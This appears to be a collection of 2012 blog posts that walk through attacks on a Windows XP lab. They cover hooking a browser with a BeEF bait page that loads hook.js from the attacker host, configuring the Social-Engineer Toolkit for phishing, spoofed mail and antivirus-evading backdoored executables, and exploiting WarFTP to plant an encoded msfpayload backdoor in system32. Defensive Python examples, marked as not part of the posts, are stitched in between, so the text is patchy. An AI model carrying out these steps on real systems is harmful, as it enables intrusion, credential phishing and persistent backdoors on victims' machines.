Wednesday, 29 February 2012

EXPLOITING WINDOWS XP USING METASPLOIT AND BeEF

In this case I will exploit a browser on Windows XP using BeEF. The Browser Exploitation Framework (BeEF) is a powerful professional security tool. BeEF pioneers techniques that give the experienced penetration tester practical client-side attack vectors.


1. Run your BeEF:


root@bt:/pentest/web/beef# ./beef 



2. Open your browser and go to http://127.0.0.1:3000/ui/panel

Username: beef
Password: beef

3. The BeEF panel is displayed.


4. Prepare your HTML page. In this case I use:

<html>
  <head>
    <title></title>
    <style></style>
  </head>
  <body bgcolor="black">
    <center>
      <!-- the BeEF hook script: loading it is what hooks the browser -->
      <script src="http://192.168.56.1:3000/hook.js" type="text/javascript"></script>
      <font color="white"><blink>HI ALL MY NAME IS AYU TING-TING</blink></font><br>

      <img src="Ayu Ting Ting.jpg" alt="ayu"><br>
      <input type="submit" value="cari_gambar_lain" name="tombol">
    </center>
  </body>
</html>

Save it as ayu.html under /var/www/ in a folder you create (for example 'deef'), i.e. /var/www/deef/.



5. Open your Windows XP machine in VirtualBox.


6. BeEF control panel

Once we see that the browser has been hooked by BeEF, let's prepare to exploit it.

7. Open msfconsole


Copy http://127.0.0.1:8080/Uf7syLPj, but change the IP to 192.168.56.1, then enter it and press Execute.

As you can see, the exploit succeeded. List the sessions, then interact with session 1:

sessions -l

sessions -i 1


Finally, success. Wait for the next trick :)
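As an added defender-side example (not part of this post, of BeEF or of Metasploit), here is a small Python checker that parses a page like the one above and flags script tags loaded from another origin, named hook.js, or served from port 3000; the sample page and the origin www.example.com are constructed:

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

SUSPICIOUS_NAMES = {"hook.js"}   # BeEF's hook script name, as used in the post
SUSPICIOUS_PORTS = {3000}        # BeEF's listening port, as used in the post


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def find_foreign_scripts(html, page_host):
    """Return [(src, [reasons])] for scripts not served by page_host or
    matching a known hook name/port. page_host is 'host' or 'host:port'."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        u = urlparse(src)
        reasons = []
        if u.netloc and u.netloc.lower() != page_host.lower():
            reasons.append("cross-origin script")
        if u.path.rsplit("/", 1)[-1] in SUSPICIOUS_NAMES:
            reasons.append("known hook script name")
        if u.port in SUSPICIOUS_PORTS:
            reasons.append("known hook port")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample: one same-origin script and one injected hook.
SAMPLE_PAGE = """<html><body>
<script src="/static/app.js"></script>
<script src="http://192.168.56.1:3000/hook.js" type="text/javascript"></script>
</body></html>"""

if __name__ == "__main__":
    for src, why in find_foreign_scripts(SAMPLE_PAGE, "www.example.com"):
        print(f"{src}: {', '.join(why)}")
```

A Content-Security-Policy with a restrictive script-src would stop such an injected hook from loading in the first place.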
Monday, 27 February 2012

What's Social Engineering and SET?


In the world of network security there is a principle that says "the strength of a chain lies in its weakest link." A chain whose links are as strong as anything is still limited by a single weak link. In network security, the weakest component is the human. Even when a system is protected by sophisticated hardware and software countermeasures such as firewalls, antivirus, IDS/IPS and so on, if the people who operate it fail, all that equipment means nothing. Cyber criminals know this, so they use a technique called "social engineering" to obtain, through a human, the important and sensitive information that a system keeps secret.

Security depends on trust: good faith in terms of authentication and protection. It is generally agreed that, as the weakest link in the security chain, the natural human tendency to believe what other people say easily creates a gap in security. Do not rely solely on the system's security measures; in the end it depends on the humans to keep a company or its information protected.


TARGET
The main purpose of social engineering, like that of hacking in general, is to obtain access to a system or information that should not be allowed, in order to commit fraud, infiltration, surveillance, or identity theft, or to destroy a system or network. The usual targets of social engineering are telephone network providers, answering services, large corporations, financial institutions, government agencies, and hospitals.


Statistically, there are five groups of individuals who often become victims of social engineering attacks:
1. Receptionists and/or the help desk of a company, because they are the entrance to the organization and usually have data/information about the personnel who work in the targeted environment;
2. Technical support staff from the information technology division, particularly those serving the leadership and management of the company, because they usually hold the keys to accessing confidential, valuable and strategic data and information;
3. System administrators and computer users, because they have the authority to manage passwords and the accounts of all users of information technology in the enterprise;
4. Partners or vendors of the target company, because they are the ones who provide the various technologies, with their features and capabilities, used by all management and employees;
5. New employees who still do not quite understand the company's information security procedures and standards.

So we can see that social engineering is the technique of obtaining confidential information from the individual who owns that information. As for the Social Engineering Toolkit:

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET has quickly become a standard tool in a penetration tester's arsenal. SET was written by David Kennedy (ReL1K) and, with a lot of help from the community, it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization, used during a penetration test.


Beginning with the Social Engineer Toolkit

The brains behind SET is its configuration file. By default SET works perfectly for most people; however, advanced customization may be needed to ensure that the attack vectors go off without a hitch. The first thing to do is to make sure you have updated SET, from its directory:

> Open your terminal


Once you've updated to the latest version, start tweaking your attack by editing the SET configuration file. Let's walk through each of the flags:


Looking through the configuration options, you can change specific fields to get a desired result. The first option lets you change the path to where Metasploit is located. Metasploit is used for payload creation, file-format bugs, and the browser exploit sections.



The Ettercap section can be used when you're on the same subnet as the victims and you want to perform DNS poisoning attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site, or all sites, to your malicious server.


Setting the SENDMAIL flag to ON will try to start SENDMAIL, which can spoof source email addresses. This attack only works if the victim's SMTP server does not perform reverse lookups on the hostname.
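The reverse-lookup defence mentioned above, as an added example that is not from this post or from SET: a forward-confirmed reverse DNS check that an SMTP server can apply to a connecting client before accepting its claimed sender. The DNS tables are constructed in-memory stand-ins, and requiring the HELO name to equal the PTR name is a strict policy assumed here, stricter than many mail servers enforce:

```python
import ipaddress

# Constructed DNS data standing in for real PTR and A lookups.
PTR_RECORDS = {
    "203.0.113.10": "mail.example.net",   # confirms: A record points back
    "198.51.100.7": "mx1.example.org",    # does not confirm: A record differs
}
A_RECORDS = {
    "mail.example.net": {"203.0.113.10"},
    "mx1.example.org": {"198.51.100.8"},
}


def fcrdns_check(client_ip, helo_name, ptr=PTR_RECORDS, a=A_RECORDS):
    """Forward-confirmed reverse DNS for an SMTP client.

    Returns (accept, reason). Accept only when the client IP has a PTR
    record, the PTR name resolves back to the same IP, and the HELO/EHLO
    name matches that PTR name (the last test is the assumed strict policy).
    """
    ipaddress.ip_address(client_ip)          # reject malformed addresses early
    rdns = ptr.get(client_ip)
    if rdns is None:
        return False, "no PTR record for client IP"
    if client_ip not in a.get(rdns, set()):
        return False, f"PTR name {rdns} does not resolve back to {client_ip}"
    if rdns.lower() != helo_name.strip().lower():
        return False, f"HELO {helo_name} does not match rDNS name {rdns}"
    return True, "forward-confirmed"


if __name__ == "__main__":
    for ip, helo in [("203.0.113.10", "mail.example.net"),
                     ("198.51.100.7", "mx1.example.org"),
                     ("203.0.113.10", "spoofed.example.com"),
                     ("192.0.2.5", "whatever")]:
        print(ip, helo, "->", fcrdns_check(ip, helo))
```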


Setting WEBATTACK_EMAIL to ON allows you to send mass emails to the victims while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu; when this is enabled, it adds the ability to email victims with links to support your attacks.


The Java Applet attack vector has one of the highest rates of success in SET's arsenal. To make the attack look more believable, you can turn this flag on, which lets you sign the Java applet with whatever name you want. Say you're targeting CompanyX: the standard Java applet is signed by Microsoft, but you can sign the applet as CompanyX to make it look more believable. This requires you to install Java's JDK (on Ubuntu that's apt-get install sun-java6-jdk or openjdk-6-jdk).



The AUTO_DETECT flag is probably the source of the most frequently asked questions about SET. In most cases, SET will grab the interface you use to connect out to the Internet and use that as the reverse connection and IP address. Many attacks need to be customized and may not be on the internal network. If you turn this flag OFF, SET will prompt you with additional questions when setting up the attack. This option should be used when you want to use multiple interfaces, have an external IP, or you're in a NAT/port-forwarding scenario.


By default the SET web server listens on port 80; if for some reason you need to change this, you can specify an alternative port.


When using the payload encoding options of SET, the best option for antivirus bypass is the backdoored executable option, i.e. an executable loaded with a malicious payload hidden inside the exe. Specifically, an exe is backdoored with a Metasploit-based payload and can generally evade most AVs out there. SET has an executable built in for the backdooring, but if for some reason you want to use a different executable, you can specify the path to that exe with the CUSTOM_EXE flag.


The web server utilized within SET is a custom-coded web server that can at times be somewhat slow depending on the needs. If you find that you need a boost and want to utilize Apache, you can flip this switch to ON and it will use Apache to handle the web requests and speed your attack up. Note that this only works with the Java Applet and Metasploit-based attacks. Because those methods depend on intercepting credentials, Apache cannot be used with the web jacking, tabnabbing, or credential harvester attack methods.


In some cases, when you're performing an advanced social-engineering attack, you may want to register a domain and buy an SSL certificate to make the attack more believable. You can incorporate SSL-based attacks with SET by turning WEBATTACK_SSL to ON. You can also use self-signed certificates, but there will be an "untrusted" warning when a victim goes to your website.



The webjacking attack is performed by replacing the victim's browser window with another window made to look like a legitimate site. This attack is very dependent on timing: if you're doing it over the Internet, I recommend a delay of 5000 (5 seconds); if you're internal, 2000 (2 seconds) is probably a safe bet.


> Run 

root@justview:/pentest/exploits/set# ./set


Open your browser


So we can conclude that social engineering is the set of ways to obtain information from a victim, and the Social Engineering Toolkit is the tool that does that job.
Metasploit auxiliary portscan

1. Open a terminal and run msfconsole


2. Use the auxiliary TCP port scanner and set the target:

msf > use auxiliary/scanner/portscan/tcp
msf  auxiliary(tcp) > set RHOSTS 192.168.56.101


3. Run it and view the result


In this case, we scanned for the ports that are open on RHOSTS (the victim).
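From the defender's side, as an added example that is not from this post or from Metasploit, a sweep like the one above leaves a trail of SYNs to many ports from one source; this Python function flags that pattern in constructed iptables-style log lines (the line format, the 10-port threshold and the 60-second window are assumptions):

```python
import re
from collections import defaultdict

# Assumed iptables-style line: "<epoch> SRC=<ip> DST=<ip> PROTO=TCP DPT=<port> SYN"
LINE_RE = re.compile(r"^(?P<ts>\d+) SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) "
                     r"PROTO=TCP DPT=(?P<dpt>\d+) SYN$")


def parse_line(line):
    """Return (ts, src, dst, dport) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return int(m["ts"]), m["src"], m["dst"], int(m["dpt"])


def find_port_scans(lines, threshold=10, window=60):
    """Flag (src, dst) pairs where one source hits more than `threshold`
    distinct destination ports within any `window` seconds.
    Returns {(src, dst): sorted list of all ports that source touched}."""
    events = defaultdict(list)                   # (src, dst) -> [(ts, port)]
    for line in lines:
        rec = parse_line(line)
        if rec:
            ts, src, dst, dport = rec
            events[(src, dst)].append((ts, dport))
    scans = {}
    for key, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):              # sliding window over time
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if len({p for _, p in evs[start:end + 1]}) > threshold:
                scans[key] = sorted({p for _, p in evs})
                break
    return scans


# Constructed log: one host sweeping 12 ports in 12 seconds, plus normal traffic.
SAMPLE_LOG = (
    [f"{1000 + i} SRC=192.168.56.1 DST=192.168.56.101 PROTO=TCP DPT={20 + i} SYN"
     for i in range(12)]
    + ["1500 SRC=192.168.56.50 DST=192.168.56.101 PROTO=TCP DPT=80 SYN",
       "1600 SRC=192.168.56.50 DST=192.168.56.101 PROTO=TCP DPT=443 SYN"]
)

if __name__ == "__main__":
    for (src, dst), ports in find_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan {src} -> {dst}: {len(ports)} ports {ports}")
```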

GOOD LUCK


WHAT'S THE DIFFERENCE BETWEEN MSFPAYLOAD AND MSFENCODE, AND HOW TO USE THEM

msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode available in Metasploit. The most common use of this tool is to generate shellcode for an exploit that is not currently in the Metasploit Framework, or to test different types of shellcode and options before finalizing a module.

Msfencode, on the other hand, is a useful tool that alters the code in an executable so that it looks different to antivirus software but still runs the same way. Much as a binary attachment in email is encoded in Base64, msfencode encodes the original executable in a new binary. Then, when the executable is run, the stub decodes the original code into memory and executes it. You can use msfencode -h to see a list of msfencode usage options. Of the msfencode options, the encoder formats are among the most important. For a list of encoder formats, we use msfencode -l, as shown next. Notice that different encoders are used for different platforms because, for example, a PowerPC (PPC) encoder will not operate correctly on an x86 platform, owing to the differences between the two architectures.


This tool has many different options and variables available, but they may not all be apparent given the limited output of the help banner.


We can use msfpayload -l to see all the payloads that msfpayload offers.


And others; you can see them if you try it :)
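An added example, not from this post or from Metasploit: because an encoded body of the kind msfencode produces is close to random, a Shannon-entropy scan over fixed-size blocks is a classic heuristic defenders use to spot it. The sample buffers are constructed (seeded random bytes stand in for encoder output), and the 1024-byte block size and 7.0-bit threshold are assumed tuning values:

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, from 0.0 (all one value) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def high_entropy_regions(data: bytes, block: int = 1024, threshold: float = 7.0):
    """Return [(offset, entropy)] for each fixed-size block above threshold.
    Block size and threshold are assumed tuning values, not standards."""
    hits = []
    for off in range(0, len(data), block):
        e = shannon_entropy(data[off:off + block])
        if e > threshold:
            hits.append((off, round(e, 2)))
    return hits


# Constructed samples. PLAIN mimics a low-entropy header/text region;
# ENCODED wraps 2048 seeded-random bytes (standing in for encoder output).
PLAIN = (b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode.") * 20
_rng = random.Random(1)
ENCODED = PLAIN[:1024] + bytes(_rng.getrandbits(8) for _ in range(2048)) + PLAIN[:1024]

if __name__ == "__main__":
    print("plain  :", high_entropy_regions(PLAIN))
    print("encoded:", high_entropy_regions(ENCODED))
```

Packed or compressed legitimate binaries score high on the same test, so treat a hit as a triage signal rather than proof.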




OK, let's exploit using msfpayload


1. First we must do service enumeration


In this case I will do the exploitation against WarFTP on Windows.


This application uses port 21, and the victim's IP address is 192.168.56.101.


2. After we know the victim's port and IP, open msfconsole


Search for warftp in msfconsole


Use one of the exploits





LHOST = your IP
RHOST = the victim's IP
RPORT = the port found by service enumeration of the application (WarFTP)



Set the target

Set the PAYLOAD




Let's show the options




OK, after our exploit is accepted, let's perform the exploitation (the WarFTP application must be running).


OK, we succeeded; now let's create a backdoor using msfpayload.


3. Create a backdoor using msfpayload


Open a new terminal



root@justview:~# cd /opt/framework/msf3/
root@justview:/opt/framework/msf3# ./msfpayload -l

We will use msfpayload in combination with msfencode



Move the generated executable to /root:
root@justview:/opt/framework/msf3# mv hajar.exe /root/

4. Upload the backdoor to Windows at C:\Windows\system32

Go back to your meterpreter session

and then execute the backdoor (payload)

5. Execute the backdoor

Open a new terminal and run msfconsole:
msf > use exploit/multi/handler